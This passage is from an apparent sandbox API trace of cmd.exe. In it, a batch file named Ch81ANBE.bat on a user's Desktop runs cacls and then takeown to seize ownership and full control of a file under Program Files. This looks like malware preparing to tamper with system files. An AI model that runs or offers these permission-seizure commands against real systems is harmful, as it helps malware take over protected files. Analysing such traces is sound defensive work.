lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x37ecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37ecc4) returned 0xffffffff [0171.597] GetLastError () returned 0x2 [0171.598] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls", fInfoLevelId=0x1, lpFindFileData=0x37ecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37ecc4) returned 0xffffffff [0171.598] GetLastError () returned 0x2 [0171.598] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0171.599] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x37ecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37ecc4) returned 0x491280 [0171.599] GetProcessHeap () returned 0x490000 [0171.599] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x4a55c0, Size=0x4) returned 0x4a55c0 [0171.599] FindClose (in: hFindFile=0x491280 | out: hFindFile=0x491280) returned 1 [0171.600] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x37ecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37ecc4) returned 0xffffffff [0171.600] GetLastError () returned 0x2 [0171.600] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x37ecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37ecc4) returned 0x491280 [0171.600] FindClose (in: hFindFile=0x491280 | out: hFindFile=0x491280) returned 1 [0171.601] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0171.601] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0171.601] GetConsoleTitleW (in: lpConsoleTitle=0x37ed14, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0171.601] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4a6720, lpFilePart=0x37e834 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x37e834*="Desktop") returned 0x25 [0171.601] SetErrorMode (uMode=0x0) returned 0x1 [0171.602] GetProcessHeap () returned 0x490000 [0171.602] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x4a6718, Size=0x60) returned 0x4a6718 [0171.602] GetProcessHeap () returned 0x490000 [0171.602] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a6718) returned 0x60 [0171.602] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0171.602] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0171.602] GetProcessHeap () returned 0x490000 [0171.602] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x120) returned 0x4a6780 [0171.602] GetProcessHeap () returned 0x490000 [0171.602] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x238) returned 0x4a68a8 [0171.603] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0171.603] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x37e5b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37e5b0) returned 0xffffffff [0171.603] GetLastError () returned 0x2 [0171.603] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls", fInfoLevelId=0x1, lpFindFileData=0x37e5b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37e5b0) returned 0xffffffff [0171.604] GetLastError () returned 0x2 [0171.604] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0171.604] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x37e5b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37e5b0) returned 0x491280 [0171.604] FindClose (in: hFindFile=0x491280 | out: hFindFile=0x491280) returned 1 [0171.605] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x37e5b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37e5b0) returned 0xffffffff [0171.605] GetLastError () returned 0x2 [0171.605] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x37e5b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37e5b0) returned 0x491280 [0171.606] FindClose (in: hFindFile=0x491280 | out: hFindFile=0x491280) returned 1 [0171.606] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0171.606] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0171.606] GetConsoleTitleW (in: lpConsoleTitle=0x37eaa8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0171.606] InitializeProcThreadAttributeList (in: lpAttributeList=0x37e930, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x37e9f8 | out: lpAttributeList=0x37e930, lpSize=0x37e9f8) returned 1 [0171.606] UpdateProcThreadAttribute (in: lpAttributeList=0x37e930, dwFlags=0x0, Attribute=0x60001, lpValue=0x37e9f0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x37e930, lpPreviousValue=0x0) returned 1 [0171.607] GetStartupInfoW (in: lpStartupInfo=0x37e8ec | out: lpStartupInfo=0x37e8ec*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0171.607] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0171.609] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x37e98c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x37e9d8 | out: lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", lpProcessInformation=0x37e9d8*(hProcess=0x74, hThread=0x78, dwProcessId=0x6a0, dwThreadId=0x64)) returned 1 [0172.043] CloseHandle (hObject=0x78) returned 1 [0172.043] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0172.043] GetProcessHeap () returned 0x490000 [0172.043] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a7f30 | out: hHeap=0x490000) returned 1 [0172.043] GetEnvironmentStringsW () returned 0x4a6b80* [0172.043] GetProcessHeap () returned 0x490000 [0172.043] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xb36) returned 0x4a7f30 [0172.043] FreeEnvironmentStringsW (penv=0x4a6b80) returned 1 [0172.043] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0182.805] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x37e8cc | out: lpExitCode=0x37e8cc*=0x1f57) returned 1 [0182.805] CloseHandle (hObject=0x74) returned 1 [0182.806] _vsnwprintf (in: _Buffer=0x37ea14, _BufferCount=0x13, _Format="%08X", _ArgList=0x37e8d8 | out: _Buffer="00001F57") returned 8 [0182.806] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00001F57") returned 1 [0182.806] GetProcessHeap () returned 0x490000 [0182.806] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a7f30 | out: hHeap=0x490000) returned 1 [0182.806] GetEnvironmentStringsW () returned 0x4a7f30* [0182.806] GetProcessHeap () returned 0x490000 [0182.806] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xb5c) returned 0x4a8a98 [0182.806] FreeEnvironmentStringsW (penv=0x4a7f30) returned 1 [0182.807] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0182.807] GetProcessHeap () returned 0x490000 [0182.807] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a8a98 | out: hHeap=0x490000) returned 1 [0182.807] GetEnvironmentStringsW () returned 0x4a7f30* [0182.807] GetProcessHeap () returned 0x490000 [0182.807] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xb5c) returned 0x4a8a98 [0182.807] FreeEnvironmentStringsW (penv=0x4a7f30) returned 1 [0182.807] GetProcessHeap () returned 0x490000 [0182.807] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x490d38 | out: hHeap=0x490000) returned 1 [0182.807] DeleteProcThreadAttributeList (in: lpAttributeList=0x37e930 | out: lpAttributeList=0x37e930) [0182.807] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.807] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0182.808] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.808] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0182.809] _get_osfhandle (_FileHandle=0) returned 0x3 [0182.809] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0182.809] SetConsoleInputExeNameW () returned 0x1 [0182.809] GetConsoleOutputCP () returned 0x1b5 [0182.810] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0182.810] SetThreadUILanguage (LangId=0x0) returned 0x409 [0182.810] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x37f14c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0182.811] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0182.811] _get_osfhandle (_FileHandle=3) returned 0x74 [0182.811] SetFilePointer (in: hFile=0x74, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0182.811] GetProcessHeap () returned 0x490000 [0182.811] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a69d8 | out: hHeap=0x490000) returned 1 [0182.811] GetProcessHeap () returned 0x490000 [0182.811] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a68a8 | out: hHeap=0x490000) returned 1 [0182.811] GetProcessHeap () returned 0x490000 [0182.811] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6780 | out: hHeap=0x490000) returned 1 [0182.811] GetProcessHeap () returned 0x490000 [0182.811] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6718 | out: hHeap=0x490000) returned 1 [0182.812] GetProcessHeap () returned 0x490000 [0182.812] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6648 | out: hHeap=0x490000) returned 1 [0182.812] GetProcessHeap () returned 0x490000 [0182.812] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6430 | out: hHeap=0x490000) returned 1 [0182.812] GetProcessHeap () returned 0x490000 [0182.812] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a63b0 | out: hHeap=0x490000) returned 1 [0182.812] GetProcessHeap () returned 0x490000 [0182.812] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6280 | out: hHeap=0x490000) returned 1 [0182.812] GetProcessHeap () returned 0x490000 [0182.812] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6158 | out: hHeap=0x490000) returned 1 [0182.812] GetProcessHeap () returned 0x490000 [0182.812] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a60f0 | out: hHeap=0x490000) returned 1 [0182.812] GetProcessHeap () returned 0x490000 [0182.812] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4911c0 | out: hHeap=0x490000) returned 1 [0182.812] GetProcessHeap () returned 0x490000 [0182.812] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4911a0 | out: hHeap=0x490000) returned 1 [0182.812] GetProcessHeap () returned 0x490000 [0182.812] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x491140 | out: hHeap=0x490000) returned 1 [0182.813] _get_osfhandle (_FileHandle=3) returned 0x74 [0182.813] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0182.813] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x37f130, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x37f130*=0xc2, lpOverlapped=0x0) returned 1 [0182.814] SetFilePointer (in: hFile=0x74, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0182.814] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0182.815] _get_osfhandle (_FileHandle=3) returned 0x74 [0182.815] GetFileType (hFile=0x74) returned 0x1 [0182.815] _get_osfhandle (_FileHandle=3) returned 0x74 [0182.815] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0182.815] GetProcessHeap () returned 0x490000 [0182.815] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x400a) returned 0x4b4aa8 [0182.816] GetProcessHeap () returned 0x490000 [0182.816] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b4aa8 | out: hHeap=0x490000) returned 1 [0182.819] _tell (_FileHandle=3) returned 47 [0182.819] _close (_FileHandle=3) returned 0 [0182.819] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x37ef04 | out: _Buffer="\r\n") returned 2 [0182.819] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.819] GetFileType (hFile=0x7) returned 0x2 [0182.820] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0182.820] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37eec4 | out: lpMode=0x37eec4) returned 1 [0182.820] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.820] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x37eef0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37eef0*=0x2) returned 1 [0182.825] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0182.825] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0182.825] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x37ef00 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0182.825] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x37ef00 | out: _Buffer=">") returned 1 [0182.825] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.825] GetFileType (hFile=0x7) returned 0x2 [0182.826] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0182.826] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37eec8 | out: lpMode=0x37eec8) returned 1 [0182.826] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.826] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x37eef4, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x37eef4*=0x26) returned 1 [0182.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.827] GetFileType (hFile=0x7) returned 0x2 [0182.827] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0182.827] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f14c | out: lpMode=0x37f14c) returned 1 [0182.828] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.828] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4912a8*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x37f178, lpReserved=0x0 | out: lpBuffer=0x4912a8*, lpNumberOfCharsWritten=0x37f178*=0x7) returned 1 [0182.829] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x37f184 | out: _Buffer=" /F \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\" ") returned 59 [0182.829] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.829] GetFileType (hFile=0x7) returned 0x2 [0182.829] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0182.829] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f144 | out: lpMode=0x37f144) returned 1 [0182.829] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.830] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3b, lpNumberOfCharsWritten=0x37f170, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37f170*=0x3b) returned 1 [0182.832] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x37f1a4 | out: _Buffer="\r\n") returned 2 [0182.832] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.832] GetFileType (hFile=0x7) returned 0x2 [0182.833] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0182.833] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f164 | out: lpMode=0x37f164) returned 1 [0182.833] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.833] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x37f190, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37f190*=0x2) returned 1 [0182.835] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0182.835] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0182.835] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0182.835] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0182.835] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0182.835] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0182.835] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0182.835] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0182.835] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0182.835] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0182.835] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0182.835] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0182.835] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0182.836] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0182.836] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0182.836] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0182.836] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0182.836] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0182.836] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0182.836] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0182.836] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0182.836] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0182.836] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0182.836] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0182.836] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0182.836] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0182.836] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0182.836] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0182.836] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0182.836] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0182.836] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0182.836] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0182.836] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0182.836] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0182.836] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0182.836] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0182.836] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0182.836] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0182.837] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0182.837] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0182.837] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0182.837] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0182.837] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4a60f8, lpFilePart=0x37ef48 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x37ef48*="Desktop") returned 0x25 [0182.838] SetErrorMode (uMode=0x0) returned 0x1 [0182.838] GetProcessHeap () returned 0x490000 [0182.838] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x4a60f0, Size=0x64) returned 0x4a60f0 [0182.838] GetProcessHeap () returned 0x490000 [0182.838] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a60f0) returned 0x64 [0182.838] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0182.838] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0182.838] GetProcessHeap () returned 0x490000 [0182.838] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x120) returned 0x4a6160 [0182.838] GetProcessHeap () returned 0x490000 [0182.838] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x238) returned 0x4a6288 [0182.838] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0182.839] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x37ecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37ecc4) returned 0xffffffff [0182.839] GetLastError () returned 0x2 [0182.839] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown", fInfoLevelId=0x1, lpFindFileData=0x37ecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37ecc4) returned 0xffffffff [0182.839] GetLastError () returned 0x2 [0182.840] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0182.840] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x37ecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37ecc4) returned 0x4a76e8 [0182.840] FindClose (in: hFindFile=0x4a76e8 | out: hFindFile=0x4a76e8) returned 1 [0182.840] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x37ecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37ecc4) returned 0xffffffff [0182.841] GetLastError () returned 0x2 [0182.841] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x37ecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37ecc4) returned 0x4a76e8 [0182.841] FindClose (in: hFindFile=0x4a76e8 | out: hFindFile=0x4a76e8) returned 1 [0182.841] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0182.841] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0182.841] GetConsoleTitleW (in: lpConsoleTitle=0x37ed14, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.842] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4a4288, lpFilePart=0x37e834 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x37e834*="Desktop") returned 0x25 [0182.842] SetErrorMode (uMode=0x0) returned 0x1 [0182.842] GetProcessHeap () returned 0x490000 [0182.842] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x4a4280, Size=0x64) returned 0x4a4280 [0182.843] GetProcessHeap () returned 0x490000 [0182.843] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a4280) returned 0x64 [0182.843] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0182.843] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0182.843] GetProcessHeap () returned 0x490000 [0182.843] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x120) returned 0x4a66e8 [0182.843] GetProcessHeap () returned 0x490000 [0182.843] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x238) returned 0x4a6810 [0182.843] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0182.844] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x37e5b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37e5b0) returned 0xffffffff [0182.844] GetLastError () returned 0x2 [0182.844] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown", fInfoLevelId=0x1, lpFindFileData=0x37e5b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37e5b0) returned 0xffffffff [0182.844] GetLastError () returned 0x2 [0182.845] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0182.845] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x37e5b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 